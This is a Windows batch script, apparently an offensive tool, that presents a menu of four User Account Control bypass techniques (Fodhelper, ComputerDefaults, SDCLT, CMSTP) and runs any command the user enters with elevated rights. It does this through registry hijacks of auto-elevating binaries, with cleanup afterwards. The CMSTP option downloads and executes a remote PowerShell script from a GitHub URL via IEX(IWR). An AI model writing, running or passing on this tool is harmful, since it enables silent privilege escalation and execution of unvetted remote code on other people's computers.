@echo off
:start
set "command="
mode con:cols=36 lines=17
color 02
title UAC Bypass
setlocal enabledelayedexpansion
cls
echo.
echo ===================================
echo     User Account Control Bypass
echo ===================================
echo.
echo  [1] Fodhelper (Registry)
echo.
echo  [2] ComputerDefaults (Registry)
echo.
echo  [3] SDCLT (Registry)
echo.
echo. [4] CMSTP (COM Hijack)
echo.
echo.
set "valid_choices=1     2     3     4"
set "choice="
set /p "choice=Select method: "
if "!valid_choices:%choice%=!"=="%valid_choices%" (
cls
mode con:cols=36 lines=12
echo.
echo ===================================
echo     User Account Control Bypass
echo ===================================
echo.
echo.
echo.
echo       Select a valid option.
echo.
echo.
echo.
timeout /t 2 > nul
timeout /t 0 > nul
timeout /t 0 > nul
timeout /t 0 > nul
timeout /t 0 > nul
timeout /t 0 > nul
goto start
)
if "!choice!"=="" (goto start)
mode con:cols=80 lines=25
cls
echo.
echo ================================================================================
echo                           User Account Control Bypass
echo ================================================================================
echo.
set /p command=Command to execute: 
if "%command%"=="" (goto start)
if "%command%"=="back" (goto start)
if "%command%"=="exit" (goto start)
if !choice! == 1 (goto fodhelp) else if !choice! == 2 (goto compdef) else if !choice! == 3 (goto sdclt) else if !choice! == 4 (goto cmstp)
:fodhelp
cls
echo.
echo ================================================================================
echo                           User Account Control Bypass
echo ================================================================================
echo.
echo Method: Fodhelper
echo.
echo Command: %command%
echo.
echo Logs:
set "command=!command:%%=%%%%!"
reg add hkcu\software\classes\ms-settings\shell\open\command /ve /d "cmd /c start %command%" /f && reg add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f && fodhelper && timeout /t 1 >nul && reg delete hkcu\software\classes\ms-settings /f >nul
echo.
echo.
echo Press any key to return to menu...
pause >nul & pause >nul
goto start
:compdef
cls
echo.
echo ================================================================================
echo                           User Account Control Bypass
echo ================================================================================
echo.
echo Method: ComputerDefaults
echo.
echo Command: %command%
echo.
echo Logs:
set "command=!command:%%=%%%%!"
reg add hkcu\software\classes\ms-settings\shell\open\command /ve /d "cmd /c start %command%" /f && reg add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f && computerdefaults && timeout /t 1 >nul && reg delete hkcu\software\classes\ms-settings /f >nul
echo.
echo.
echo Press any key to return to menu...
pause >nul & pause >nul
goto start
:sdclt
cls
echo.
echo ================================================================================
echo                           User Account Control Bypass
echo ================================================================================
echo.
echo Method: SDCLT
echo.
echo Command: %command%
echo.
echo Logs:
set "command=!command:%%=%%%%!"
reg add HKCU\Software\Classes\Folder\shell\open\command /ve /d "cmd /c start %command%" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f && sdclt && timeout /t 1 >nul && reg delete HKCU\Software\Classes\Folder /f >nul
echo.
echo.
echo Press any key to return to menu...
pause >nul & pause >nul
goto start
:cmstp
cls
echo.
echo ================================================================================
echo                           User Account Control Bypass
echo ================================================================================
echo.
echo Method: CMSTP
echo.
echo Command: %command%
echo.
echo Logs:
set "command=!command:%%=%%%%!"
powershell -c "IEX(IWR https://raw.githubusercontent.com/rindonbrg/0/master/9 -UseBasicParsing); repo -c 'cmd /c start %command%'| Out-Null; Remove-Item 'C:\Windows\Temp\*.inf' -Force; echo 'Payload file deleted'"
echo.
echo.
echo Press any key to return to menu...
pause >nul & pause >nul
goto start
